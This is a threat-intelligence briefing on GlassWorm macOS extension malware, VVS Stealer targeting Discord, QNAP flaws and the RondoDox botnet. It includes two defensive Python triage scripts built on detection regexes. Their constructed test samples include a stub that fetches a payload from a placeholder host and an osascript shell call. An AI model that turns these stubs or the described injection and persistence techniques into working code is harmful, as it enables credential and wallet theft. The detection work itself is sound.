Daily Threat Briefing

Cyware Daily Threat Intelligence, January 05, 2026

DTI - 08 Dec

Mac developers are no longer spared the supply chain threats that have plagued Windows users. The GlassWorm malware has launched a new wave of attacks targeting macOS systems through malicious VSCode and OpenVSX extensions that deliver trojanized cryptocurrency wallet applications.

A new threat is being marketed on Telegram as the "ultimate stealer" for hijacking digital identities. VVS Stealer is a Python-based malware that specifically targets Discord credentials and tokens while evading detection with advanced obfuscation. Sold via subscription, this malware establishes persistence on victim machines and displays fake error messages.

A silent nine-month campaign has been conscripting IoT devices and web servers into a new botnet named RondoDox. Attackers are exploiting the critical React2Shell vulnerability in Next.js and React Server Components, and roughly 90,000 instances remain exposed, predominantly in the U.S. The operation has now entered an automated deployment phase.

Top Malware Reported in the Last 24 Hours

New GlassWorm malware wave targets Macs

A new wave of GlassWorm malware is specifically targeting macOS developers through malicious VSCode and OpenVSX extensions that deliver trojanized crypto wallet applications. This campaign marks a shift from previous attacks, which focused on Windows systems. The malware embeds AES-256-CBC–encrypted payloads in JavaScript and runs its malicious logic only after a 15-minute delay to evade sandbox and dynamic analysis. It establishes persistence with AppleScript and LaunchAgents rather than the Windows Registry. GlassWorm also attempts to replace legitimate hardware wallet applications such as Ledger Live and Trezor Suite with compromised versions, although this routine is currently broken. Despite increased scrutiny, the malware continues to steal credentials and sensitive data, including Keychain passwords, and the extensions have recorded over 33,000 installations, a figure that may be artificially inflated to lend them credibility.
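Defenders who want to triage the extensions installed on developer Macs can start from the behaviours described above. The script below, an added example and not GlassWorm code or published IOCs, walks a VS Code or VSCodium extensions directory and flags JavaScript files that match several of the described traits at once: an AES-256-CBC decryption routine, a 15-minute timer, an osascript call, a LaunchAgents path or a reference to the wallet apps. The indicator strings, the two-hit threshold and the extension directory defaults are assumptions; treat any hit as a lead for manual review, not a verdict.

```python
"""Heuristic triage of installed VS Code / OpenVSX extensions for the
macOS behaviours described in the briefing. Added example; the patterns
are assumptions derived from the described behaviour, not vendor IOCs."""
from __future__ import annotations

import os
import re
from pathlib import Path

# (rule name, regex). Each regex is a heuristic assumption, not a signature.
RULES = [
    ("aes-256-cbc in JS", re.compile(r"aes-256-cbc", re.I)),
    # setTimeout with 900000 ms or the literal expression 15 * 60 * 1000
    ("15-minute timer", re.compile(
        r"setTimeout\s*\([^;]*?\b(?:900000|15\s*\*\s*60\s*\*\s*1000)\b", re.S)),
    ("osascript call", re.compile(r"\bosascript\b")),
    ("LaunchAgents path", re.compile(r"Library/LaunchAgents")),
    ("wallet app reference", re.compile(r"Ledger Live|Trezor Suite")),
]


def scan_source(text: str) -> list[str]:
    """Return the names of every rule that matches this JavaScript source."""
    return [name for name, rx in RULES if rx.search(text)]


def scan_extensions_dir(root: Path, min_hits: int = 2) -> dict[str, list[str]]:
    """Walk an extensions directory (node_modules included, since a payload
    can hide in a vendored dependency) and report files matching at least
    min_hits rules. Two independent indicators are required because
    'osascript' alone is common in legitimate macOS tooling (assumed threshold)."""
    findings: dict[str, list[str]] = {}
    for path in root.rglob("*.js"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = scan_source(text)
        if len(hits) >= min_hits:
            findings[str(path)] = hits
    return findings


# Constructed sample, not real GlassWorm code, combining three of the traits.
SAMPLE_SUSPICIOUS = (
    "const d = crypto.createDecipheriv('aes-256-cbc', key, iv);\n"
    "setTimeout(run, 15 * 60 * 1000);\n"
    "execSync('osascript -e \"do shell script ...\"');\n"
)
SAMPLE_BENIGN = "module.exports = { activate() {}, deactivate() {} };\n"

if __name__ == "__main__":
    # Assumed default extension roots: VS Code and VSCodium/OpenVSX clients.
    for d in ("~/.vscode/extensions", "~/.vscode-oss/extensions"):
        root = Path(os.path.expanduser(d))
        if root.is_dir():
            for f, hits in scan_extensions_dir(root).items():
                print(f"{f}: {', '.join(hits)}")
```

Run it as the developer user on the affected Mac; on a clean system the default roots produce no output. The same heuristics can be pointed at a downloaded .vsix after unzipping it, which is the cheaper check before an extension is installed at all.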

New VVS Stealer malware targets Discord accounts

Cybersecurity researchers have identified a new Python-based malware known as VVS Stealer, which specifically targets Discord accounts by harvesting credentials and tokens. Advertised on Telegram as the "ultimate stealer," it is obfuscated with Pyarmor to hinder detection and analysis and is sold cheaply through several subscription tiers. Once installed, VVS Stealer establishes persistence by copying itself into the Windows Startup folder and displays fake error messages to trick users into restarting their computers. It steals a wide range of data, including Discord tokens, browser data, and screenshots. It can also perform Discord injection to hijack active sessions, downloading a malicious JavaScript payload from a remote server into the Discord client.
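Two host-level checks follow directly from the persistence and injection behaviour described above. The script below is an added example, not VVS Stealer code or a vendor detection: it lists Startup-folder entries that are not on a per-host allow-list, and it verifies that Discord's desktop-core loader (index.js under discord_desktop_core) is still the stock one-line require of core.asar, which is what client-injection stealers replace with a stub that pulls remote JavaScript. The install layout under %LOCALAPPDATA%\Discord and the empty allow-list are assumptions to adjust per host.

```python
"""Startup-folder review and Discord loader integrity check for the
behaviours described in the briefing. Added example; the Discord path
layout and the Startup allow-list are assumptions."""
from __future__ import annotations

import os
import re
from pathlib import Path

# Stock discord_desktop_core/index.js is a single require of core.asar.
CLEAN_LOADER = re.compile(
    r"^\s*module\.exports\s*=\s*require\(\s*['\"]\./core\.asar['\"]\s*\)\s*;?\s*$")
# Traits of an injection stub: remote URL, fetch/https.get, or child_process.
REMOTE_LOAD = re.compile(
    r"https?://|\bfetch\s*\(|\bhttps\.get\s*\(|require\(\s*['\"]child_process['\"]\s*\)")


def loader_verdict(index_js: str) -> str:
    """'clean' for the stock loader, 'injected' when a remote-load pattern is
    present, 'modified' for any other change (still worth a manual look)."""
    if CLEAN_LOADER.match(index_js):
        return "clean"
    if REMOTE_LOAD.search(index_js):
        return "injected"
    return "modified"


def find_discord_loaders(local_appdata: Path) -> list[Path]:
    """Every desktop-core loader under %LOCALAPPDATA%\\Discord; several
    app-* folders usually exist after updates (assumed standard layout)."""
    pattern = "app-*/modules/discord_desktop_core-*/discord_desktop_core/index.js"
    return sorted((local_appdata / "Discord").glob(pattern))


def suspicious_startup_entries(startup_dir: Path,
                               allowed: frozenset[str] = frozenset()) -> list[str]:
    """Names in the Startup folder not on the allow-list. Scripts, shortcuts
    and executables all count; desktop.ini is Windows housekeeping."""
    return sorted(p.name for p in startup_dir.iterdir()
                  if p.name.lower() != "desktop.ini" and p.name not in allowed)


# Constructed samples, not real VVS Stealer code.
SAMPLE_CLEAN = "module.exports = require('./core.asar');\n"
SAMPLE_INJECTED = (
    "const https = require('https');\n"
    "https.get('https://example.invalid/payload.js', r => { /* eval body */ });\n"
    "module.exports = require('./core.asar');\n"
)
SAMPLE_MODIFIED = "module.exports = require('./core.asar'); require('./extra');\n"

if __name__ == "__main__":
    appdata = Path(os.environ.get("APPDATA", ""))
    local = Path(os.environ.get("LOCALAPPDATA", ""))
    startup = appdata / "Microsoft/Windows/Start Menu/Programs/Startup"
    if startup.is_dir():
        print("Startup entries to review:", suspicious_startup_entries(startup))
    for idx in find_discord_loaders(local):
        verdict = loader_verdict(idx.read_text(encoding="utf-8", errors="replace"))
        print(f"{idx} -> {verdict}")
```

A 'modified' verdict is not proof of compromise (some third-party client mods also edit this file), but on a corporate endpoint any non-stock loader should be restored from a clean Discord install and the account's tokens rotated, since a restart prompted by a fake error is exactly how the described Startup persistence takes effect.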

Top Vulnerabilities Reported in the Last 24 Hours

QNAP patches critical security vulnerabilities

QNAP has addressed several vulnerabilities in its NAS software, including high-severity SQL injection and path traversal flaws. The SQL injection, tracked as CVE-2025-59387, affects the Multi-Application Recovery Service (MARS, since renamed HDP for WordPress) and allows attackers to execute unauthorized SQL commands; it is fixed in version 1.2.1.1686 and later. The path traversal flaw in Qfiling, CVE-2025-59384, permits unauthorized access to sensitive files and is patched in version 3.13.1 and later. A lower-severity path traversal vulnerability was also found in Qfinder Pro, Qsync, and QVPN Device Client for macOS. QNAP additionally fixed an out-of-bounds read and a buffer overflow in License Center.

RondoDox botnet exploits React2Shell

A persistent nine-month campaign has targeted IoT devices and web applications, forming a botnet known as RondoDox. The campaign exploits React2Shell (CVE-2025-55182), a critical flaw in React Server Components and Next.js that allows unauthenticated remote code execution. As of December 2025, approximately 90,300 instances remain vulnerable, predominantly in the U.S. RondoDox has broadened its exploit set with additional vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX21 command injection) and CVE-2025-24893 (XWiki remote code execution). The campaign progressed through three phases: initial reconnaissance and scanning, mass probing of web applications and IoT devices, and automated large-scale deployment. In recent attacks the operators have targeted vulnerable Next.js servers, deploying cryptocurrency miners and Mirai variants while actively killing competing malware on the same hosts.
